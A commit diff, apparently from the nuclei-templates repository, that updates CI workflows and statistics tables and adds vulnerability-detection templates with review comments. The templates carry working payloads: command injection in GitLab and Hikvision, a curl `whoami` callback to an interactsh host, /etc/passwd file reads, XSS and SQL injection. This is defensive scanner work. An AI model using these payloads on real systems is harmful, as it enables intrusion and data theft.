commit
80484df046
|
@ -11,23 +11,19 @@ jobs:
|
||||||
with:
|
with:
|
||||||
go-version: 1.17
|
go-version: 1.17
|
||||||
|
|
||||||
#- name: Cache Go
|
- name: Cache Go
|
||||||
# id: cache-go
|
id: cache-go
|
||||||
# uses: actions/cache@v2
|
uses: actions/cache@v2
|
||||||
# with:
|
with:
|
||||||
# path: /home/runner/go
|
path: /home/runner/go
|
||||||
# key: ${{ runner.os }}-go
|
key: ${{ runner.os }}-go
|
||||||
|
|
||||||
- name: Installing Nuclei
|
- name: Installing Nuclei
|
||||||
# if: steps.cache-go.outputs.cache-hit != 'true'
|
if: steps.cache-go.outputs.cache-hit != 'true'
|
||||||
env:
|
|
||||||
GO111MODULE: on
|
|
||||||
run: |
|
run: |
|
||||||
go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev
|
go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
|
||||||
shell: bash
|
|
||||||
|
|
||||||
- name: Template Validation
|
- name: Template Validation
|
||||||
run: |
|
run: |
|
||||||
nuclei -validate -t .
|
nuclei -validate -t .
|
||||||
nuclei -validate -w ./workflows
|
nuclei -validate -w ./workflows
|
||||||
shell: bash
|
|
|
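Review bot: The cache key `${{ runner.os }}-go` never changes, and the newly enabled `if: steps.cache-go.outputs.cache-hit != 'true'` guard skips "Installing Nuclei" on every hit, so after the first run the validator keeps using whichever nuclei build was cached first and the switch to `@latest` has no practical effect. Either drop the `if:` guard so `go install` always runs (the module cache still makes it fast), or put something that actually changes in the `key:`. Separately, resolving `@latest` inside CI means the validation tool can change underneath a PR without any change in this repository; pinning to a release tag (`go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@v2.x.y`) and bumping it deliberately is the usual supply-chain fix. `actions/cache@v2` and `actions/setup-go@v2` float on major-version tags; pinning to a commit SHA is stricter but optional.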
@ -1,13 +1,11 @@
|
||||||
name: 🗒 Templates Stats
|
name: 🗒 Templates Stats
|
||||||
|
|
||||||
on:
|
on:
|
||||||
create:
|
|
||||||
workflow_dispatch:
|
workflow_dispatch:
|
||||||
|
|
||||||
jobs:
|
jobs:
|
||||||
build:
|
build:
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
if: ${{ startsWith(github.ref, 'refs/tags/v') }}
|
|
||||||
steps:
|
steps:
|
||||||
- uses: actions/checkout@master
|
- uses: actions/checkout@master
|
||||||
- uses: actions/setup-go@v2
|
- uses: actions/setup-go@v2
|
||||||
|
|
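Review bot: With the `create:` trigger and the `startsWith(github.ref, 'refs/tags/v')` guard both removed, this job now runs only on `workflow_dispatch`; if the stats are still expected to refresh when a release tag is pushed, that automation is gone, so confirm this is intended. `actions/checkout@master` remains on a mutable branch ref; pin it to a release tag or commit SHA (`- uses: actions/checkout@v2`) so a broken or compromised upstream branch cannot change what this workflow executes. The job body continues outside the hunk.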
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
||||||
|
|
||||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||||
| cve | 838 | dhiyaneshdk | 296 | cves | 842 | info | 775 | http | 2244 |
|
| cve | 843 | dhiyaneshdk | 300 | cves | 847 | info | 806 | http | 2286 |
|
||||||
| lfi | 344 | daffainfo | 289 | vulnerabilities | 329 | high | 651 | file | 50 |
|
| lfi | 348 | daffainfo | 290 | vulnerabilities | 332 | high | 655 | file | 51 |
|
||||||
| panel | 284 | pikpikcu | 281 | exposed-panels | 278 | medium | 478 | network | 46 |
|
| panel | 292 | pikpikcu | 281 | exposed-panels | 286 | medium | 483 | network | 46 |
|
||||||
| xss | 259 | pdteam | 201 | technologies | 202 | critical | 297 | dns | 12 |
|
| xss | 260 | pdteam | 202 | technologies | 203 | critical | 299 | dns | 12 |
|
||||||
| wordpress | 255 | geeknik | 166 | exposures | 196 | low | 156 | | |
|
| wordpress | 260 | geeknik | 166 | exposures | 199 | low | 157 | | |
|
||||||
| exposure | 245 | dwisiswant0 | 131 | misconfiguration | 143 | | | | |
|
| exposure | 248 | dwisiswant0 | 152 | misconfiguration | 143 | | | | |
|
||||||
| rce | 215 | gy741 | 83 | takeovers | 65 | | | | |
|
| rce | 218 | gy741 | 83 | token-spray | 83 | | | | |
|
||||||
| tech | 196 | pussycat0x | 74 | token-spray | 63 | | | | |
|
| tech | 197 | pussycat0x | 76 | takeovers | 66 | | | | |
|
||||||
| wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | |
|
| wp-plugin | 180 | princechaddha | 67 | default-logins | 60 | | | | |
|
||||||
| cve2020 | 166 | madrobot | 63 | file | 50 | | | | |
|
| cve2020 | 166 | madrobot | 63 | file | 51 | | | | |
|
||||||
|
|
||||||
**176 directories, 2418 files**.
|
**178 directories, 2459 files**.
|
||||||
|
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
|
1860
TEMPLATES-STATS.md
1860
TEMPLATES-STATS.md
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
||||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||||
| cve | 838 | dhiyaneshdk | 296 | cves | 842 | info | 775 | http | 2244 |
|
| cve | 843 | dhiyaneshdk | 300 | cves | 847 | info | 806 | http | 2286 |
|
||||||
| lfi | 344 | daffainfo | 289 | vulnerabilities | 329 | high | 651 | file | 50 |
|
| lfi | 348 | daffainfo | 290 | vulnerabilities | 332 | high | 655 | file | 51 |
|
||||||
| panel | 284 | pikpikcu | 281 | exposed-panels | 278 | medium | 478 | network | 46 |
|
| panel | 292 | pikpikcu | 281 | exposed-panels | 286 | medium | 483 | network | 46 |
|
||||||
| xss | 259 | pdteam | 201 | technologies | 202 | critical | 297 | dns | 12 |
|
| xss | 260 | pdteam | 202 | technologies | 203 | critical | 299 | dns | 12 |
|
||||||
| wordpress | 255 | geeknik | 166 | exposures | 196 | low | 156 | | |
|
| wordpress | 260 | geeknik | 166 | exposures | 199 | low | 157 | | |
|
||||||
| exposure | 245 | dwisiswant0 | 131 | misconfiguration | 143 | | | | |
|
| exposure | 248 | dwisiswant0 | 152 | misconfiguration | 143 | | | | |
|
||||||
| rce | 215 | gy741 | 83 | takeovers | 65 | | | | |
|
| rce | 218 | gy741 | 83 | token-spray | 83 | | | | |
|
||||||
| tech | 196 | pussycat0x | 74 | token-spray | 63 | | | | |
|
| tech | 197 | pussycat0x | 76 | takeovers | 66 | | | | |
|
||||||
| wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | |
|
| wp-plugin | 180 | princechaddha | 67 | default-logins | 60 | | | | |
|
||||||
| cve2020 | 166 | madrobot | 63 | file | 50 | | | | |
|
| cve2020 | 166 | madrobot | 63 | file | 51 | | | | |
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CNVD-2019-06255
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: CatfishCMS RCE
|
||||||
|
author: Lark-Lab
|
||||||
|
severity: medium
|
||||||
|
reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/
|
||||||
|
tags: rce,cvnd,catfishcms
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
condition: and
|
||||||
|
words:
|
||||||
|
- 'OS'
|
||||||
|
- 'PATH'
|
||||||
|
- 'SHELL'
|
||||||
|
- 'USER'
|
|
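Review bot: The `words` matcher keys on the bare tokens `OS`, `PATH`, `SHELL`, `USER`, which are case-sensitive substrings of ordinary page text (`POST`, `XPATH`, `USERNAME`), so a 200 response from an unrelated page can satisfy all four and the template will report false positives. If the `filter[]=system` payload is meant to execute `set` via the `s=set` parameter, its output has the form `PATH=/...` and `SHELL=/...`; matching those (`- 'PATH=/'`, `- 'SHELL=/'`) or a regex such as `PATH=\S*bin` is far more specific. The tag `cvnd` looks like a typo for `cnvd`. The only reference is a writeup hosted on a bare IP address (`http://112.124.31.29/...`); the CNVD entry or a stable advisory link would age better.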
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2015-5471
|
||||||
|
info:
|
||||||
|
name: Swim Team <= v1.44.10777 - Local File Inclusion
|
||||||
|
author: 0x_Akoko
|
||||||
|
severity: medium
|
||||||
|
description: The code in ./wp-swimteam/include/user/download.php doesnt sanitize user input from downloading sensitive system files.
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568
|
||||||
|
- http://www.vapid.dhs.org/advisory.php?v=134
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-5471
|
||||||
|
tags: cve,cve2015,wordpress,wp-plugin,lfi
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||||
|
cvss-score: 5.30
|
||||||
|
cve-id: CVE-2015-5471
|
||||||
|
cwe-id: CWE-22
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
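Review bot: The request hard-codes `abspath=/usr/share/wordpress`, which is the Debian package install path; if download.php uses that parameter to locate the WordPress install (the referenced advisory would confirm), any site deployed under another document root will not reproduce and the template misses it. Adding path variants for common roots such as `/var/www/html`, or dropping the parameter if it turns out to be optional, would widen coverage — worth checking against the advisory before changing. Also `doesnt` in the description should read `doesn't`.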
@ -0,0 +1,37 @@
|
||||||
|
id: CVE-2016-1000136
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: heat-trackr v1.0 - XSS via heat-trackr_abtest_add.php
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: Reflected XSS in wordpress plugin heat-trackr v1.0
|
||||||
|
reference:
|
||||||
|
- http://www.vapidlabs.com/wp/wp_advisory.php?v=798
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000136
|
||||||
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2016-1000136
|
||||||
|
cwe-id: CWE-79
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '</script><script>alert(document.domain)</script>'
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2017-0929
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: DotNetNuke ImageHandler SSRF
|
||||||
|
author: charanrayudu,meme-lord
|
||||||
|
severity: high
|
||||||
|
description: DNN (aka DotNetNuke) before 9.2.0 suffers from a Server-Side Request Forgery (SSRF) vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources.
|
||||||
|
reference:
|
||||||
|
- https://hackerone.com/reports/482634
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-0929
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.50
|
||||||
|
cve-id: CVE-2017-0929
|
||||||
|
cwe-id: CWE-918
|
||||||
|
tags: cve,cve2017,oast,ssrf,dnn
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/DnnImageHandler.ashx?mode=file&url=http://{{interactsh-url}}'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol
|
||||||
|
words:
|
||||||
|
- "http"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 500
|
|
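Review bot: The matchers require both an HTTP interaction on the OAST server and a `500` response, and with `matchers-condition: and` a target that fetches the URL but answers `200` or `404` is reported as not vulnerable. The out-of-band hit is the actual evidence of SSRF; unless a 500 is known to be the consistent response for `mode=file`, drop the status matcher or relax the condition to `or`. The `tags:` key sits after `classification` here while the other templates in this commit put it before; keeping the key order consistent helps diffing.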
@ -4,6 +4,7 @@ info:
|
||||||
name: Etherpad Lite before 1.6.4 is exploitable for admin access.
|
name: Etherpad Lite before 1.6.4 is exploitable for admin access.
|
||||||
author: philippedelteil
|
author: philippedelteil
|
||||||
severity: critical
|
severity: critical
|
||||||
|
description: Etherpad Lite before 1.6.4 is exploitable for admin access.
|
||||||
reference:
|
reference:
|
||||||
- https://infosecwriteups.com/account-takeovers-believe-the-unbelievable-bb98a0c251a4
|
- https://infosecwriteups.com/account-takeovers-believe-the-unbelievable-bb98a0c251a4
|
||||||
- https://github.com/ether/etherpad-lite/commit/ffe24c3dd93efc73e0cbf924db9a0cc40be9511b
|
- https://github.com/ether/etherpad-lite/commit/ffe24c3dd93efc73e0cbf924db9a0cc40be9511b
|
||||||
|
|
|
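Review bot: The added `description:` repeats the `name:` verbatim, so it gives a reader nothing the title does not; a description should state what the check exercises — e.g. which request grants admin access, as documented in the referenced commit — rather than restate the title. The rest of the template is outside the hunk.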
@ -6,7 +6,7 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1.
|
description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1.
|
||||||
reference: https://trovent.io/security-advisory-2010-01
|
reference: https://trovent.io/security-advisory-2010-01
|
||||||
tags: cve,cve2020,rockethchat
|
tags: cve,cve2020,rocketchat
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||||
cvss-score: 5.30
|
cvss-score: 5.30
|
||||||
|
|
|
@ -0,0 +1,63 @@
|
||||||
|
id: CVE-2021-22205
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: GitLab CE/EE Unauthenticated RCE using ExifTool
|
||||||
|
author: pdteam
|
||||||
|
severity: critical
|
||||||
|
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
|
||||||
|
reference:
|
||||||
|
- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
|
||||||
|
- https://hackerone.com/reports/1154542
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-22205
|
||||||
|
tags: cve,cve2021,gitlab,rce,oast
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.90
|
||||||
|
cve-id: CVE-2021-22205
|
||||||
|
cwe-id: CWE-20
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /users/sign_in HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Origin: {{BaseURL}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /uploads/user HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
|
||||||
|
X-CSRF-Token: {{csrf-token}}
|
||||||
|
|
||||||
|
{{hex_decode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}}curl `whoami`.{{interactsh-url}}{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'Failed to process image'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the DNS Interaction
|
||||||
|
words:
|
||||||
|
- "dns"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 422
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: csrf-token
|
||||||
|
internal: true
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- 'csrf-token" content="(.*?)" />\n\n<meta'
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: whoami
|
||||||
|
part: interactsh_request
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '([a-z0-9]+)\.([a-z0-9]+)\.interactsh\.com'
|
|
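Review bot: The `whoami` extractor regex `([a-z0-9]+)\.([a-z0-9]+)\.interactsh\.com` only matches the public server, so with a self-hosted interactsh (`-iserver`) the extractor silently yields nothing even though `{{interactsh-url}}` still works. A suffix-agnostic form such as `'([a-z0-9_-]+)\.[a-z0-9]+\.[a-z0-9.-]+'` captures the first label regardless of domain, at some cost in specificity. The CSRF regex `csrf-token" content="(.*?)" />\n\n<meta` depends on exactly two newlines before the next `<meta`; `csrf-token" content="([^"]+)"` is less fragile. The multipart payload executes `curl \`whoami\`` on the target, which is a real command run; this commit tags the Hikvision template `intrusive` for its command execution, so consider the same tag here. The first `hex_decode` argument is not legible in this rendering, so I could not check the multipart body itself.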
@ -0,0 +1,49 @@
|
||||||
|
id: CVE-2021-36260
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Hikvision IP camera/NVR - Unauthenticated RCE
|
||||||
|
author: pdteam,gy741
|
||||||
|
severity: critical
|
||||||
|
description: A command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.
|
||||||
|
reference:
|
||||||
|
- https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
|
||||||
|
- https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-36260
|
||||||
|
- https://github.com/Aiminsun/CVE-2021-36260
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2021-36260
|
||||||
|
cwe-id: CWE-77,CWE-20
|
||||||
|
metadata:
|
||||||
|
shodan-query: http.favicon.hash:999357577
|
||||||
|
tags: cve,cve2021,hikvision,rce,iot,intrusive
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
PUT /SDK/webLanguage HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
|
||||||
|
<?xml version="1.0" encoding="UTF-8"?><language>$(id>webLib/x)</language>
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /x HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
req-condition: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- "contains(body_2,'uid=') && contains(body_2,'gid=')"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "(u|g)id=.*"
|
|
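Review bot: The injection `$(id>webLib/x)` drops a file `x` into the device's web root and nothing in the template removes it, so every scanned camera keeps a world-readable artifact after the run. The `intrusive` tag is right, but the description should say so explicitly (add something like `Note: this check writes webLib/x on the target and does not clean it up`), and a cleanup or a non-persisting variant of the command is worth considering if one works. Minor: `cvss-score: 9.8` while the other templates in this commit write two decimals (`9.80`).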
@ -0,0 +1,35 @@
|
||||||
|
id: CVE-2021-36749
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Apache Druid Authentication Restrictions Bypass
|
||||||
|
author: _0xf4n9x_
|
||||||
|
severity: medium
|
||||||
|
description: In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.
|
||||||
|
reference:
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-36749
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2021-36749/
|
||||||
|
- https://github.com/BrucessKING/CVE-2021-36749
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 6.5
|
||||||
|
cve-id: CVE-2021-36749
|
||||||
|
cwe-id: CWE-668
|
||||||
|
tags: cve,cve2021,apache,lfi,auth-bypass
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/json
|
||||||
|
|
||||||
|
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":[" file:///etc/passwd "]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string", "parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"no_ such_ column","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0:"
|
||||||
|
- "druid:*:1000:1000:"
|
||||||
|
condition: or
|
|
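Review bot: The second regex `druid:*:1000:1000:` does not do what it looks like — `:*` means zero or more colons, so it only matches strings like `druid::1000:1000:` and never a real passwd line `druid:x:1000:1000:`; it should be `druid:[x*]:1000:1000:` or `druid:.*:1000:1000:` like the first pattern. The JSON body contains `" file:///etc/passwd "` and `"no_ such_ column"` with embedded spaces, which look like copy artefacts; a leading space inside the URI would presumably fail URI parsing on the server, so verify the request against a live instance. The CVSS vector `AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` scores 8.8, not the listed 6.5; a 6.5 corresponds to `C:H/I:N/A:N` with the same base metrics, so one of the two fields is wrong.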
@ -0,0 +1,69 @@
|
||||||
|
id: CVE-2021-42258
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: BillQuick Web Suite SQLi
|
||||||
|
author: dwisiswant0
|
||||||
|
severity: critical
|
||||||
|
tags: cve,cve2021,sqli,billquick
|
||||||
|
description: |
|
||||||
|
BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1
|
||||||
|
allows SQL injection for unauthenticated remote code execution,
|
||||||
|
as exploited in the wild in October 2021 for ransomware installation.
|
||||||
|
SQL injection can, for example, use the txtID (aka username) parameter.
|
||||||
|
Successful exploitation can include the ability to execute
|
||||||
|
arbitrary code as MSSQLSERVER$ via xp_cmdshell.
|
||||||
|
reference:
|
||||||
|
- https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-42258
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.80
|
||||||
|
cve-id: CVE-2021-42258
|
||||||
|
cwe-id: CWE-89
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET / HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST / HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Referer: {{BaseURL}}
|
||||||
|
Origin: {{RootURL}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
extractors:
|
||||||
|
- type: xpath
|
||||||
|
name: VS
|
||||||
|
internal: true
|
||||||
|
attribute: value
|
||||||
|
xpath:
|
||||||
|
- "/html/body/form/div/input[@id='__VIEWSTATE']"
|
||||||
|
|
||||||
|
- type: xpath
|
||||||
|
name: VSG
|
||||||
|
internal: true
|
||||||
|
attribute: value
|
||||||
|
xpath:
|
||||||
|
- "/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"
|
||||||
|
|
||||||
|
- type: xpath
|
||||||
|
name: EV
|
||||||
|
internal: true
|
||||||
|
attribute: value
|
||||||
|
xpath:
|
||||||
|
- "/html/body/form/div/input[@id='__EVENTVALIDATION']"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
condition: and
|
||||||
|
words:
|
||||||
|
- "System.Data.SqlClient.SqlException"
|
||||||
|
- "Incorrect syntax near"
|
||||||
|
- "_ACCOUNTLOCKED"
|
|
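Review bot: The three extractors use absolute XPaths (`/html/body/form/div/input[@id='__VIEWSTATE']`), so any extra wrapper element in the login page makes them miss and the second request is sent with empty `__VIEWSTATE`/`__EVENTVALIDATION`, which ASP.NET rejects before the injected `txtID` value is ever evaluated. Since the `id` attributes are unique, `//input[@id='__VIEWSTATE']` (and likewise for `__VIEWSTATEGENERATOR` and `__EVENTVALIDATION`) is both shorter and more robust. With `condition: and` the matcher also needs `_ACCOUNTLOCKED` in the error page alongside the `SqlException` text; if that token only appears on some builds, vulnerable installs will be missed — worth confirming against the advisory.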
@ -0,0 +1,39 @@
|
||||||
|
id: CVE-2021-42565
|
||||||
|
|
||||||
|
info:
|
||||||
|
author: madrobot
|
||||||
|
name: myfactory FMS - Reflected XSS
|
||||||
|
severity: medium
|
||||||
|
description: myfactory.FMS before 7.1-912 allows XSS via the UID parameter.
|
||||||
|
reference:
|
||||||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566
|
||||||
|
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2021-42565
|
||||||
|
cwe-id: CWE-79
|
||||||
|
tags: cve,cve2021,myfactory,xss
|
||||||
|
|
||||||
|
requests:
